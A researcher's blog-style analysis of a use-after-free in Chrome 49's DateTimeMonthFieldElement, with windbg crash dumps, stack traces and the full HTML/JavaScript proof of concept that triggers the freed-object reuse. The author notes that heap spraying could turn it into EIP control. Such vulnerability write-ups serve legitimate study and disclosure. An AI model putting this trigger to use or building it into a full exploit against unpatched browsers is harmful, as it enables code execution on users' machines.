Recently, we found an interesting case in Chrome 49 stable, after reduce the POC, I submited it to bugs.chromium.org as issue id 603129, but unfortunately, Chrome 50 stable was released the next day, and this bug can’t repro in Chrome 50,  tkent, member of Chrome team, marked this case as  “WontFix”,  he said, “Since Google Chrome 50, Blink uses garbage collection instead of reference counting. So, use-after-free rarely happens in Blink.” So I decide to analysis this case, and share it to community.

Use windbg to start Chrome 49, load the POC, Chrome 49 stable will crash:

(6c4.d00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1484aa05 ebx=05a90530 ecx=05aa9294 edx=00000007 esi=0025e764 edi=00000001
eip=5fccac63 esp=0025e740 ebp=0025e750 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
chrome_child!blink::DateTimeEditElement::valueAsDateTimeFieldsState+0x65:
5fccac63 ff9038020000 call dword ptr [eax+238h] ds:0023:1484ac3d=????????

3:031> k
ChildEBP RetAddr 
0025e750 5f610049 chrome_child!blink::DateTimeEditElement::valueAsDateTimeFieldsState+0x65 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\shadow\datetimeeditelement.cpp - 814 
0025e788 5f5c27cc chrome_child!blink::BaseMultipleFieldsDateAndTimeInputType::saveFormControlState+0x58 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\forms\basemultiplefieldsdateandtimeinputtype.cpp - 489 
0025e794 5f226a83 chrome_child!blink::HTMLInputElement::saveFormControlState+0x14 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\htmlinputelement.cpp - 544 
0025e7e8 5ef97276 chrome_child!blink::DocumentState::toStateVector+0x181 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\forms\formcontroller.cpp - 431 
0025e808 5ef9723b chrome_child!blink::HistoryItem::documentState+0x1a c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\historyitem.cpp - 144 
0025e810 5ef96c93 chrome_child!blink::WebHistoryItem::documentState+0xa c:\b\build\slave\win\build\src\third_party\webkit\source\web\webhistoryitem.cpp - 129 
0025e8dc 5ef96a48 chrome_child!content::`anonymous namespace'::GenerateFrameStateFromItem+0x1cb c:\b\build\slave\win\build\src\content\renderer\history_serialization.cc - 101 
0025e900 5ef968d1 chrome_child!content::`anonymous namespace'::RecursivelyGenerateFrameState+0x18 c:\b\build\slave\win\build\src\content\renderer\history_serialization.cc - 122 
0025ea44 5ef93d3e chrome_child!content::HistoryEntryToPageState+0x3c c:\b\build\slave\win\build\src\content\renderer\history_serialization.cc - 182 
0025ea88 5ef9333b chrome_child!content::RenderViewImpl::SendUpdateState+0x78 c:\b\build\slave\win\build\src\content\renderer\render_view_impl.cc - 1521 
0025eccc 5ee90a89 chrome_child!content::RenderFrameImpl::didCommitProvisionalLoad+0x235 c:\b\build\slave\win\build\src\content\renderer\render_frame_impl.cc - 3131 
0025ecf0 5ee1fd87 chrome_child!blink::FrameLoaderClientImpl::dispatchDidCommitLoad+0x92 c:\b\build\slave\win\build\src\third_party\webkit\source\web\frameloaderclientimpl.cpp - 492 
0025ed70 5ee0b6b8 chrome_child!blink::FrameLoader::receivedFirstData+0xbb c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\frameloader.cpp - 429 
0025edf8 5ee0b4bd chrome_child!blink::DocumentLoader::ensureWriter+0x114 c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 521 
0025ee78 5ef92276 chrome_child!blink::DocumentLoader::commitData+0x25 c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 527 
0025eea8 5ef92166 chrome_child!blink::DocumentLoader::processData+0x89 c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 597 
0025eed4 5ee9abb8 chrome_child!blink::DocumentLoader::dataReceived+0x5e c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 575 
0025ef14 5ee9a73e chrome_child!blink::RawResource::appendData+0xa8 c:\b\build\slave\win\build\src\third_party\webkit\source\core\fetch\rawresource.cpp - 101 
0025ef38 5ee9a67b chrome_child!blink::ResourceLoader::didReceiveData+0x84 c:\b\build\slave\win\build\src\third_party\webkit\source\core\fetch\resourceloader.cpp - 424 
0025ef5c 5ee9a4a2 chrome_child!content::WebURLLoaderImpl::Context::OnReceivedData+0x64 c:\b\build\slave\win\build\src\content\child\web_url_loader_impl.cc - 700 
0025efc4 5ee9a2ff chrome_child!content::ResourceDispatcher::OnReceivedData+0x1a0 c:\b\build\slave\win\build\src\content\child\resource_dispatcher.cc - 290 
0025efe0 5ee9a227 chrome_child!base::DispatchToMethodImpl<content::ResourceDispatcher,void (__thiscall content::ResourceDispatcher::*)(int,int,int,int),int,int,int,int,0,1,2,3>+0x2e c:\b\build\slave\win\build\src\base\tuple.h - 252 
0025f00c 5ee939a8 chrome_child!ResourceMsg_DataReceived::Dispatch<content::ResourceDispatcher,content::ResourceDispatcher,void,void (__thiscall content::ResourceDispatcher::*)(int,int,int,int)>+0x2e c:\b\build\slave\win\build\src\content\common\resource_messages.h - 366 
0025f0d8 5ed6b1c5 chrome_child!content::ResourceDispatcher::DispatchMessageW+0x24b c:\b\build\slave\win\build\src\content\child\resource_dispatcher.cc - 554 
0025f100 5ee9372e chrome_child!content::ResourceDispatcher::OnMessageReceived+0xae c:\b\build\slave\win\build\src\content\child\resource_dispatcher.cc - 123 
0025f110 5ee84ae4 chrome_child!content::`anonymous namespace'::DispatchMessageTask::run+0x2e c:\b\build\slave\win\build\src\content\child\resource_scheduling_filter.cc - 31 
0025f118 5ee84ac3 chrome_child!scheduler::WebTaskRunnerImpl::runTask+0xb c:\b\build\slave\win\build\src\components\scheduler\child\web_task_runner_impl.cc - 50 
0025f124 5ee84a9f chrome_child!base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>::Run+0x11 c:\b\build\slave\win\build\src\base\bind_internal.h - 157 
0025f130 5ee84a83 chrome_child!base::internal::InvokeHelper<0,void,base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>,base::internal::TypeList<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > >::MakeItSo+0x17 c:\b\build\slave\win\build\src\base\bind_internal.h - 298 
0025f144 5ed69f55 chrome_child!base::internal::Invoker<base::IndexSequence<0>,base::internal::BindState<base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>,void __cdecl(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >),base::internal::PassedWrapper<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > >,base::internal::TypeList<base::internal::UnwrapTraits<base::internal::PassedWrapper<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > > >,base::internal::InvokeHelper<0,void,base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>,base::internal::TypeList<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > >,void __cdecl(void)>::Run+0x19 c:\b\build\slave\win\build\src\base\bind_internal.h - 350 
0025f1a4 5edf1183 chrome_child!base::debug::TaskAnnotator::RunTask+0x130 c:\b\build\slave\win\build\src\base\debug\task_annotator.cc - 51 
0025f250 5edf0400 chrome_child!scheduler::TaskQueueManager::ProcessTaskFromWorkQueue+0x1b1 c:\b\build\slave\win\build\src\components\scheduler\base\task_queue_manager.cc - 268 
0025f37c 5edf0304 chrome_child!scheduler::TaskQueueManager::DoWork+0xf8 c:\b\build\slave\win\build\src\components\scheduler\base\task_queue_manager.cc - 180 
0025f398 5edf02bc chrome_child!base::internal::InvokeHelper<1,void,base::internal::RunnableAdapter<void (__thiscall scheduler::TaskQueueManager::*)(base::TimeTicks,bool)>,base::internal::TypeList<base::WeakPtr<scheduler::TaskQueueManager> const &,base::TimeTicks const &,bool const &> >::MakeItSo+0x42 c:\b\build\slave\win\build\src\base\bind_internal.h - 307 
0025f3b4 5ed69f55 chrome_child!base::internal::Invoker<base::IndexSequence<0,1,2>,base::internal::BindState<base::internal::RunnableAdapter<void (__thiscall scheduler::TaskQueueManager::*)(base::TimeTicks,bool)>,void __cdecl(scheduler::TaskQueueManager *,base::TimeTicks,bool),base::WeakPtr<scheduler::TaskQueueManager>,base::TimeTicks,bool>,base::internal::TypeList<base::internal::UnwrapTraits<base::WeakPtr<scheduler::TaskQueueManager> >,base::internal::UnwrapTraits<base::TimeTicks>,base::internal::UnwrapTraits<bool> >,base::internal::InvokeHelper<1,void,base::internal::RunnableAdapter<void (__thiscall scheduler::TaskQueueManager::*)(base::TimeTicks,bool)>,base::internal::TypeList<base::WeakPtr<scheduler::TaskQueueManager> const &,base::TimeTicks const &,bool const &> >,void __cdecl(void)>::Run+0x25 c:\b\build\slave\win\build\src\base\bind_internal.h - 350 
0025f410 5ed69d5f chrome_child!base::debug::TaskAnnotator::RunTask+0x130 c:\b\build\slave\win\build\src\base\debug\task_annotator.cc - 51 
0025f47c 5ed69b52 chrome_child!base::MessageLoop::RunTask+0x185 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 488 
0025f5b0 5ed6bcfe chrome_child!base::MessageLoop::DoWork+0x478 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 608 
0025f5dc 5ed69620 chrome_child!base::MessagePumpDefault::Run+0xc6 c:\b\build\slave\win\build\src\base\message_loop\message_pump_default.cc - 34 
0025f600 5ed69528 chrome_child!base::MessageLoop::RunHandler+0x65 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 451 
0025f628 5ed69422 chrome_child!base::RunLoop::Run+0x89 c:\b\build\slave\win\build\src\base\run_loop.cc - 57 
0025f650 5edb854c chrome_child!base::MessageLoop::Run+0x22 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 294 
0025f7e8 5ed616f4 chrome_child!content::RendererMain+0x368 c:\b\build\slave\win\build\src\content\renderer\renderer_main.cc - 234 
0025f7fc 5ed61670 chrome_child!content::RunNamedProcessTypeMain+0x61 c:\b\build\slave\win\build\src\content\app\content_main_runner.cc - 382 
0025f848 5ed47d8b chrome_child!content::ContentMainRunnerImpl::Run+0x5f c:\b\build\slave\win\build\src\content\app\content_main_runner.cc - 787 
0025f858 5ed47a6f chrome_child!content::ContentMain+0x23 c:\b\build\slave\win\build\src\content\app\content_main.cc - 19 
*** ERROR: Symbol file could not be found. Defaulted to export symbols for chrome.exe - 
0025f898 00d67e6b chrome_child!ChromeMain+0x61 c:\b\build\slave\win\build\src\chrome\app\chrome_main.cc - 70 
WARNING: Stack unwind information not available. Following frames may be wrong.
0025f978 00d67416 chrome!GetUploadedReportsImpl+0xbf9
0025faac 00da3e1a chrome!GetUploadedReportsImpl+0x1a4
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 
0025faf8 75f2ee1c chrome!IsSandboxedProcess+0x31c12
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - 
0025fb04 77153a03 kernel32!BaseThreadInitThunk+0x12
0025fb44 771539d6 ntdll!RtlInitializeExceptionChain+0xef
0025fb5c 00000000 ntdll!RtlInitializeExceptionChain+0xc2

3:031> lmvm chrome_child
start end module name
5ed40000 61817000 chrome_child (private pdb symbols) c:\symbols\chrome_child.dll.pdb\ED5E5CDDD59F46E99F980CAB8DDBC4141\chrome_child.dll.pdb
 Loaded symbol image file: C:\Program Files\Google\Chrome\Application\49.0.2623.112\chrome_child.dll
 Image path: C:\Program Files\Google\Chrome\Application\49.0.2623.112\chrome_child.dll
 Image name: chrome_child.dll
 Timestamp: Wed Apr 06 08:29:27 2016 (57045867)
 CheckSum: 02981495
 ImageSize: 02AD7000
 File version: 49.0.2623.112
 Product version: 49.0.2623.112
 File flags: 0 (Mask 17)
 File OS: 4 Unknown Win32
 File type: 1.0 App
 File date: 00000000.00000000
 Translations: 0409.04b0
 CompanyName: Google Inc.
 ProductName: Google Chrome
 InternalName: chrome_dll
 OriginalFilename: chrome.dll
 ProductVersion: 49.0.2623.112
 FileVersion: 49.0.2623.112
 FileDescription: Google Chrome
 LegalCopyright: Copyright 2015 Google Inc. All rights reserved.

As this bug was found in Chrome version 49.0.2623.112, we can review the code from google source:

https://chromium.googlesource.com/chromium/src.git/+/49.0.2623.112

the crash point related code:

source

(https://chromium.googlesource.com/chromium/src.git/+/49.0.2623.112/third_party/WebKit/Source/core/html/shadow/DateTimeEditElement.cpp)

m_fields is defined in DateTimeEditElement.h, it’s a DateTimeFieldElement list:

20160421152623

(https://chromium.googlesource.com/chromium/src.git/+/49.0.2623.112/third_party/WebKit/Source/core/html/shadow/DateTimeEditElement.h)

Now, we know this is an UAF bug of DateTimeFieldElement, because it’s an “Element” object, we can set a break point in windbg to observe the release of all Element object like this:

 bp chrome_child!blink::Element::~Element "r;k;g" 

Reload the POC, and wait, when comes up crash, search the value of ECX in windbg, we can get the call stack when release this obect:

eax=00000001 ebx=078153b0 ecx=078a9294 edx=0500776c esi=078a9294 edi=0500776c
eip=6459d342 esp=0027e4e0 ebp=0027e4e8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
chrome_child!blink::Element::~Element:
6459d342 51 push ecx
ChildEBP RetAddr 
0027e4dc 655448f9 chrome_child!blink::Element::~Element c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\element.cpp @ 171 
0027e4e8 6459c714 chrome_child!blink::DateTimeMonthFieldElement::`scalar deleting destructor'+0xb
0027e4f4 6453b654 chrome_child!blink::Node::removedLastRef+0x4a c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\node.cpp @ 2192 
0027e500 64c83d67 chrome_child!WTF::VectorDestructor<1,WTF::RefPtr<blink::Node> >::destruct+0x31 c:\b\build\slave\win\build\src\third_party\webkit\source\wtf\vector.h @ 70 
0027e56c 64c8339f chrome_child!blink::Range::processContents+0x668 c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\range.cpp @ 600 
0027e584 64db60a0 chrome_child!blink::Range::deleteContents+0x55 c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\range.cpp @ 392 
0027e5e0 65043dfd chrome_child!blink::DOMSelection::deleteFromDocument+0x90 c:\b\build\slave\win\build\src\third_party\webkit\source\core\editing\domselection.cpp @ 460 
0027e5e8 65043e62 chrome_child!blink::DOMSelectionV8Internal::deleteFromDocumentMethod+0x35 c:\b\build\slave\win\build\src\out\release\gen\blink\bindings\core\v8\v8selection.cpp @ 515 
0027e5f4 6466a825 chrome_child!blink::DOMSelectionV8Internal::deleteFromDocumentMethodCallback+0x41 c:\b\build\slave\win\build\src\out\release\gen\blink\bindings\core\v8\v8selection.cpp @ 522 
0027e628 6466a582 chrome_child!v8::internal::FunctionCallbackArguments::Call+0x7e c:\b\build\slave\win\build\src\v8\src\arguments.cc @ 34 
0027e6a8 6466a22d chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper<0>+0x310 c:\b\build\slave\win\build\src\v8\src\builtins.cc @ 3487 
0027e6d0 6466a1f6 chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x30 c:\b\build\slave\win\build\src\v8\src\builtins.cc @ 3510 
0027e784 6462f8e3 chrome_child!v8::internal::Builtin_HandleApiCall+0x14 c:\b\build\slave\win\build\src\v8\src\builtins.cc @ 3506 
0027e7d8 6462f7fd chrome_child!v8::internal::`anonymous namespace'::Invoke+0xda c:\b\build\slave\win\build\src\v8\src\execution.cc @ 99 
0027e820 646b8ffe chrome_child!v8::internal::Execution::Call+0x24b c:\b\build\slave\win\build\src\v8\src\execution.cc @ 164 
0027e864 646b8da1 chrome_child!v8::Function::Call+0x130 c:\b\build\slave\win\build\src\v8\src\api.cc @ 4388 
0027e8f8 646ed9f8 chrome_child!blink::V8ScriptRunner::callFunction+0x1b3 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8scriptrunner.cpp @ 441 
0027e928 6487935c chrome_child!blink::ScriptController::callFunction+0x48 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\scriptcontroller.cpp @ 153 
0027e950 646ba29d chrome_child!blink::V8LazyEventListener::callListenerFunction+0xa5 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8lazyeventlistener.cpp @ 100 
0027e9dc 646f00a0 chrome_child!blink::V8AbstractEventListener::invokeEventHandler+0x154 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8abstracteventlistener.cpp @ 139 
0027ea1c 646b992c chrome_child!blink::V8AbstractEventListener::handleEvent+0xc0 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8abstracteventlistener.cpp @ 100 

(584.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14848a07 ebx=07890530 ecx=078a9294 edx=00000007 esi=0027ea6c edi=00000001
eip=653dac63 esp=0027ea48 ebp=0027ea58 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
chrome_child!blink::DateTimeEditElement::valueAsDateTimeFieldsState+0x65:
653dac63 ff9038020000 call dword ptr [eax+238h] ds:0023:14848c3f=????????

From the call stack, we learn some more information of this bug now,  it’s a DateTimeMonthFieldElement UAF, this DateTimeMonthFieldElement object was deleted by the operation of DOMSelection::deleteFromDocument, let’s take a look at the POC to see what happened:

<!DOCTYPE html>
<html>
<head id="head">
 <meta charset="utf-8" id="meta1">
 <meta http-equiv="Cache-Control" content="no-cache" id="meta2">
 <title id="title">cm45.eng.1.0.001.js -> cm45.1.0.001.php: 20160316_185920</title>
 <style id="style">

 </style>
 <script src="#" type="text/javascript" id="s1"></script>
 <script src="#" type="text/javascript" id="s2"></script>
 <script src="#" type="text/javascript" id="s3"></script>
 <script src="#" type="text/javascript" id="s4"></script>
 <script type="text/javascript" id="s5">

 function xlab_fuzzing() {
     g_ele_ref_son = null;
     g_ele_ref_parent = null;
     g_element_list = [];
     g_ele_ref_son = document.all[12];
     g_ele_ref_son.addEventListener("DOMSubtreeModified", function(){
         window.g_ele_ref_son = document.all[45 % document.all.length];
         g_ele_ref_son.parentElement.innerHTML = "<table><td colspan=10></td></table>";
     }, true);
     g_ele_ref_son = document.all[40]
     g_ele_ref_son.addEventListener("DOMNodeRemoved", function () {
         window.ele_call_target = document.all[93 % document.all.length];
         ele_call_target.setRangeText(15);
     }, false);
     g_ele_ref_son.addEventListener("DOMSubtreeModified", function () {
         var ele_input_list = document.getElementsByTagName("input");
         window.ele_input_target = ele_input_list[23 % ele_input_list.length];
         ele_input_target.type = 'date';
         window.ele_input_target = ele_input_list[88 % ele_input_list.length];
     }, false);
     g_ele_ref_son = document.createElement('form');
     g_element_list.push(g_ele_ref_son);
     g_ele_ref_parent = document.body;
     var ele = g_ele_ref_parent.cloneNode(true);
     document.body.appendChild(g_ele_ref_son);
     g_ele_ref_son.appendChild(ele);
     window.ele_call_target = document.all[58 % document.all.length];
     ele_call_target.remove('', document.all[335 % document.all.length]);
     g_ele_ref_son = document.createElement('layer');
     g_ele_ref_parent.insertAdjacentElement("afterEnd", g_ele_ref_son);
     g_ele_ref_son = document.createElement('b');
     g_ele_ref_parent.insertAdjacentHTML("afterEnd", "<iframe>");
     g_ele_ref_parent.appendChild(g_ele_ref_son);
     g_ele_ref_son = document.createElement('layer');
     document.all[46].appendChild(g_ele_ref_son);
     g_ele_ref_son = document.createElement('cite');
     g_ele_ref_parent.insertAdjacentElement("beforeBegin", g_ele_ref_son);
     g_ele_ref_son = document.createElement('layer');
     var ele = g_ele_ref_parent.cloneNode(true);
     document.body.appendChild(g_ele_ref_son);
     g_ele_ref_son.appendChild(ele);
     g_ele_ref_son.innerText="2147483649";
     g_ele_ref_son = document.createElement('layer');
     g_ele_ref_parent.appendChild(g_ele_ref_son);
     g_ele_ref_son = document.getElementsByTagName("form")[1];
     g_ele_ref_son.innerText="0";
     g_ele_ref_son.nextElementSibling.outerHTML = "<table><td colspan=10></td></table>";
     window.ele_call_target = document.all[827 % document.all.length];
     ele_call_target.appendChild(document.all[638 % document.all.length], '');
     var ele_input_list = document.getElementsByTagName("input");
     ele_input_target.type = 'image';
     window.getSelection().collapseToStart();
     document.execCommand("SelectAll");
     window.getSelection().deleteFromDocument();
     window.location.reload();
 }
 </script>

</head>

<body id="body" onload="xlab_fuzzing();">
<table>
 <caption>Monthly savings</caption>

 <colgroup>
 <col span="2" style="background-color:red">
 <col style="background-color:yellow">
 </colgroup>

 <thead>
 <tr>
 <th>Month</th>
 <th>Savings</th>
 </tr>
 </thead>
 <tfoot>
 <tr>
 <td>Sum</td>
 <td>$180</td>
 </tr>
 </tfoot>
 <tbody>
 <tr>
 <td>January</td>
 <td>$100</td>
 </tr>
 <tr>
 <td>February</td>
 <td>$80</td>
 </tr>
 </tbody>

</table>

<ol>
 <li>Coffee</li>
 <li>Tea</li>
 <li>Milk</li>
</ol>

<ul>
 <li>Coffee</li>
 <li>Tea</li>
 <li>Milk</li>
</ul>

<dl>
 <dt>Coffee</dt>
 <dd>Black hot drink</dd>
 <dt>Milk</dt>
 <dd>White cold drink</dd>
</dl>


<form>
 <label for="male">Male</label>
 <input type="tel" name="fname"><br>
 <input type="email" name="fname"><br>
 <input type="url" name="fname"><br>
 <input type="search" name="fname"><br>
 <input type="range" min="18" max="120" step="5" value="28" name="fname"><br>
 <input type="color" name="fname"><br>
 <input type="datetime" name="fname"><br>
 <input type="datetime-local" name="fname"><br>
 <input type="time" name="fname"><br>
 <input type="date" name="fname"><br>
 <input type="week" name="fname"><br>
 <input type="month" name="fname"><br>
 <input type="number" name="fname"><br>
 <input type="text" name="fname"><br>
 <input type="password" name="pwd">
 <input type="button" value="Hello world!">
 <input type="radio" name="sex" id="male" value="male"><br>
 <input type="radio" name="sex" id="female" value="female"><br>
 <input type="checkbox" name="vehicle" value="Bike">I have a bike<br>
 <input type="checkbox" name="vehicle" value="Car">I have a car
 <input type="submit" value="Submit">
 <keygen name="security"></keygen>

 <fieldset>
 <legend>Personalia:</legend>
 <input type="text" name="fname"><br>
 <input type="text" name="fname"><br>
 </fieldset>

 <input list="browsers">

 <datalist id="browsers">
 <option value="Internet Explorer">
 </option><option value="Firefox">
 </option><option value="Chrome">
 </option><option value="Opera">
 </option><option value="Safari">
 </option></datalist>

 <input type="range" id="a" value="50">
 <input type="number" id="b" value="50">
 <output name="x" for="a b"></output>
</form>

</body>
</html>

The javascript statments relate to the operation of DOMSelection::deleteFromDocument:

document.execCommand("SelectAll");
window.getSelection().deleteFromDocument();

Those two line of javascript will delete the all elements in the DOM, including the DateTimeMonthFieldElement, but it seems Chrome still has reference of this DateTimeMonthFieldElement object.

When the page is reloaded by window.location.reload();, chrome will repaint the page, and reuse the DateTimeMonthFieldElement freed before, but the VTable is gone.

By using heap spray or some other method, we can control the EIP of Chrome.

Chrome 49 stable DateTimeMonthFieldElement UAF & POC